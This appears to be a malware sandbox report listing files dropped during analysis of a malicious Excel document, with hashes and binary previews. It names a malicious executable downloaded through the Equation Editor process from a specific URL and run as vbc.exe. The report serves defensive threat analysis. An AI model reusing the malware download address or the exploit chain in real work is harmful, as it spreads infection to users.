                                                                                      Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):326
                                                                                      Entropy (8bit):3.1392054451166236
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kKjafqdoW+N+SkQlPlEGYRMY9z+4KlDA3RUeIlD1Ut:OG5kPlE99SNxAhUe0et
                                                                                      MD5:73D434F5661B6D463F837080EA943642
                                                                                      SHA1:2CD8845DF98F90DB4BF2DD9209A13437A63DB3B0
                                                                                      SHA-256:EF803AE8B228F3D5EEF8B4DB9F65942A0F90D72579AF0470F87DD1A5AA8A06D6
                                                                                      SHA-512:88D5DFB03A5EE72A3D41877CB900AE4160BE6D70A8EEE75D9F6C6601B6D0AC1FD8356CDFF075ECE6FCD3A3F63B04C14471C507BBDC3C79E41D29F7165883EDA5
                                                                                      Malicious:false
                                                                                      Preview: p...... .........'..j...(....................................................... .........T'._......$...........\...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.6.5.4.2.7.7.5.f.d.7.1.:.0."...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:downloaded
                                                                                      Size (bytes):479232
                                                                                      Entropy (8bit):7.4170903584629215
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:NUdeni+TLedHTiw3CzfM5B2OR0GU4V24TfWOQCs/I:KciCqdziw3KeRHtJHs/I
                                                                                      MD5:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      SHA1:6C0B89DC4C773E51D660780450CBD148F2FF3211
                                                                                      SHA-256:3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                                                                                      SHA-512:B6804A6968FA7A6F68D1A8F6161A0C69584DBFEB88EFF5F7784C259F2886FE1B444438576D47AB5DDA24496A619DFBFFE02050BC679A3F3E13DD6BC82F61C3C1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: kwFDCU89PZ.exe, Detection: malicious, Browse
                                                                                      IE Cache URL:http://arkemagrup.com/Doc_87654334567.exe
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.`..............0.. ... .......5... ...@....... ....................................@.................................05..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3593FE9D.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):11303
                                                                                      Entropy (8bit):7.909402464702408
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D6D8CE.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):648132
                                                                                      Entropy (8bit):2.8123789386507605
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:z34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:74UcLe0JOcXuunhqcS
                                                                                      MD5:6CB928BE3E67F24A61029E293EF3D385
                                                                                      SHA1:2026D18C43EC013CCABD05193648ED51F11723D6
                                                                                      SHA-256:27BB1F6D2D0771E33EEABDC1A8884E798B802497B0ADD328EF2967BEC69481AA
                                                                                      SHA-512:FD5DC00F1513E2740D488D63B73D529279635D52BE9CEFD29B23018ABEF9776D602BB7C6644510E6731451B78C104F2B57DCC462C210CBF66B8B5EB919EFFC3B
                                                                                      Malicious:false
                                                                                      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i...................................................../Q$.....<.-z8Q.@..%.....<.<.<.......<. .<..N.R..<...<.......<...<..N.R..<...<. ....y8Q..<...<. ............z8Q............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........,.<.X.....<...<...........ovdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AAF8EAF.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):94963
                                                                                      Entropy (8bit):7.9700481154985985
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                      MD5:17EC925977BED2836071429D7B476809
                                                                                      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E649BE6.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):62140
                                                                                      Entropy (8bit):7.529847875703774
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                      MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5BA4E7B3.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):94963
                                                                                      Entropy (8bit):7.9700481154985985
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                      MD5:17EC925977BED2836071429D7B476809
                                                                                      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8762AF39.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):11303
                                                                                      Entropy (8bit):7.909402464702408
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D4B7BFA.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):62140
                                                                                      Entropy (8bit):7.529847875703774
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                      MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A9691677.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):7608
                                                                                      Entropy (8bit):5.0848395387371825
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:+SpE1LSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Sq+sW31RGtdVDYM3VfmkpH
                                                                                      MD5:59A006365F7CA7E6809AEC593181D9BA
                                                                                      SHA1:DDBB1CBA3306CEC237FB6D0130AD72B7EFF610BC
                                                                                      SHA-256:8C2E1E41CEB13848ADEA43DEA1382211D57B0C72B505D4E6054F7505ED624B4E
                                                                                      SHA-512:187F9B65553198DF1B17083A86B5EF2D3610445094A2D29C77E1A142E1E8CBCD50F044DE3089509FFA43E7E1C41161FF1DB6E96620867666E0FB4B05C89652B4
                                                                                      Malicious:false
                                                                                      Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................$.6.).X...`...d............................q....\.............,.....q........6.u...q....`..q..$.$y.w..................w....$.....|.d...n...d...^ q.....^ q.......(GQ.....-.......<.w................<..v.Znv....X.XR......$.......................ovdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AAE88E0C.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC2C1618.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4E71.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4EA1.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4EA2.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF96C.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF96D.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
